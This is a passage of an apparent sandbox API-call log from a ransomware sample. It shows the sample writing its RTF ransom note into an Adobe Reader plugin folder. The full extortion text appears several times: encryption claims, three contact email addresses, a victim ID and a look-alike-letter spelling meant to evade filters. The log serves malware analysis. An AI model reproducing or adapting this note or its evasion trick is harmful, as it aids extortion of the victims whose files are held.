y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0065.482] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x2867358, cbMultiByte=7247, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", lpUsedDefaultChar=0x0) returned 7247 [0065.482] WriteFile (in: hFile=0x1dc, lpBuffer=0x2867358*, nNumberOfBytesToWrite=0x1c4f, lpNumberOfBytesWritten=0x395fdbc, lpOverlapped=0x0 | out: lpBuffer=0x2867358*, lpNumberOfBytesWritten=0x395fdbc*=0x1c4f, lpOverlapped=0x0) returned 1 [0065.484] CloseHandle (hObject=0x1dc) returned 1 [0065.484] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\ENU\\BG85_INFO.rtf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\enu\\bg85_info.rtf")) returned 0xffffffff [0065.484] GetLastError () returned 0x2 [0065.484] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\ENU\\BG85_INFO.rtf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\enu\\bg85_info.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0065.485] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 